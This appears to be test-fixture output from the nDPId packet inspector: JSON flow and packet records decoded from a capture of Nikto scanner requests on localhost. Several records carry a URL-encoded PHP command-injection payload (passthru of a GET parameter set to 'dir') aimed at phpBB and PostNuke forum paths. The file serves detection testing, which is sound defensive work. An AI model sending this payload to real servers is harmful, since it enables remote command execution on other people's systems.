{"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":659,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277758,"flow_last_seen":1576420277758,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277758,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50880,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":659,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":659,"flow_packet_id":1,"flow_last_seen":1576420277758,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277758,"pkt":"AAAAAAAAAAAAAAAACABFAAFmwkJAAEAGeU1\/AAABfwAAAcbAH5DScvtgYIpbaYAYAED\/WgAAAQEICp1m\/yadZv8mR0VUIC9tb2R1bGVzL2luZGV4LnBocD9OaWt0bz1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MCkNCg0K"} 
-01224{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":659,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277758,"flow_last_seen":1576420277758,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277758,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50880,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":660,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277760,"flow_last_seen":1576420277760,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277760,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50882,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00889{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":660,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":660,"flow_packet_id":1,"flow_last_seen":1576420277760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277760,"pkt":"AAAAAAAAAAAAAAAACABFAAFkSaBAAEAG8fF\/AAABfwAAAcbCH5CzknC\/qWQ1toAYAED\/WAAAAQEICp1m\/yidZv8oR0VUIC9waHBCQi9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQoNCg=="} -01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":660,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277760,"flow_last_seen":1576420277760,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277760,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50882,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":661,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277762,"flow_last_seen":1576420277762,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277762,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50884,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00889{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":661,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":661,"flow_packet_id":1,"flow_last_seen":1576420277762,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277762,"pkt":"AAAAAAAAAAAAAAAACABFAAFkl59AAEAGo\/J\/AAABfwAAAcbEH5DhFa6+6BKXhoAYAED\/WAAAAQEICp1m\/yqdZv8qR0VUIC9mb3J1bS9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQoNCg=="} 
-01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":661,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277762,"flow_last_seen":1576420277762,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277762,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50884,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":662,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277764,"flow_last_seen":1576420277764,"flow_idle_time":7440000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277764,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50886,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00876{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":662,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":662,"flow_packet_id":1,"flow_last_seen":1576420277764,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":363,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":363,"pkt_l4_len":329,"thread_ts_msec":1576420277764,"pkt":"AAAAAAAAAAAAAAAACABFAAFdzxpAAEAGbH5\/AAABfwAAAcbGH5DgufY6a2RlI4AYAED\/UQAAAQEICp1m\/yydZv8sR0VUIC9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MSkNCg0K"} -01214{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":662,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277764,"flow_last_seen":1576420277764,"flow_idle_time":7440000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277764,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50886,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":663,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277766,"flow_last_seen":1576420277766,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277766,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50888,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":663,"flow_packet_id":1,"flow_last_seen":1576420277766,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277766,"pkt":"AAAAAAAAAAAAAAAACABFAAFm3WVAAEAGXip\/AAABfwAAAcbIH5DcNuRDgHH2c4AYAED\/WgAAAQEICp1m\/y2dZv8tR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
-01224{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":663,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277766,"flow_last_seen":1576420277766,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277766,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50888,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":664,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277767,"flow_last_seen":1576420277767,"flow_idle_time":7440000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420277767,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50890,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00895{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":664,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":664,"flow_packet_id":1,"flow_last_seen":1576420277767,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":377,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":377,"pkt_l4_len":343,"thread_ts_msec":1576420277767,"pkt":"AAAAAAAAAAAAAAAACABFAAFrfdxAAEAGva5\/AAABfwAAAcbKH5Cyd0T8zDk2q4AYAED\/XwAAAQEICp1m\/y+dZv8vR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9uYW1lPWZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkxKQ0KDQo="} -01230{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":664,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277767,"flow_last_seen":1576420277767,"flow_idle_time":7440000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420277767,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50890,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":665,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277769,"flow_last_seen":1576420277769,"flow_idle_time":7440000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420277769,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50892,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":665,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":665,"flow_packet_id":1,"flow_last_seen":1576420277769,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":371,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":371,"pkt_l4_len":337,"thread_ts_msec":1576420277769,"pkt":"AAAAAAAAAAAAAAAACABFAAFl4jZAAEAGWVp\/AAABfwAAAcbMH5Dub9sXJ7s4LIAYAED\/WQAAAQEICp1m\/zGdZv8wR0VUIC9tb2R1bGVzL2luZGV4LnBocD9uYW1lPWZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkxKQ0KDQo="} 
-01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":665,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277769,"flow_last_seen":1576420277769,"flow_idle_time":7440000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420277769,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50892,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":666,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277770,"flow_last_seen":1576420277770,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277770,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50894,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00884{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":666,"flow_packet_id":1,"flow_last_seen":1576420277770,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"thread_ts_msec":1576420277770,"pkt":"AAAAAAAAAAAAAAAACABFAAFjvxlAAEAGfHl\/AAABfwAAAcbOH5BOc4Y2FZ1LBYAYAED\/VwAAAQEICp1m\/zKdZv8yR0VUIC9waHBCQi9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01221{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":666,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277770,"flow_last_seen":1576420277770,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277770,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50894,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":667,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277772,"flow_last_seen":1576420277772,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277772,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50896,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00884{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":667,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":667,"flow_packet_id":1,"flow_last_seen":1576420277772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"thread_ts_msec":1576420277772,"pkt":"AAAAAAAAAAAAAAAACABFAAFjEuZAAEAGKK1\/AAABfwAAAcbQH5A1ISvIAGoQJ4AYAED\/VwAAAQEICp1m\/zSdZv8zR0VUIC9mb3J1bS9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
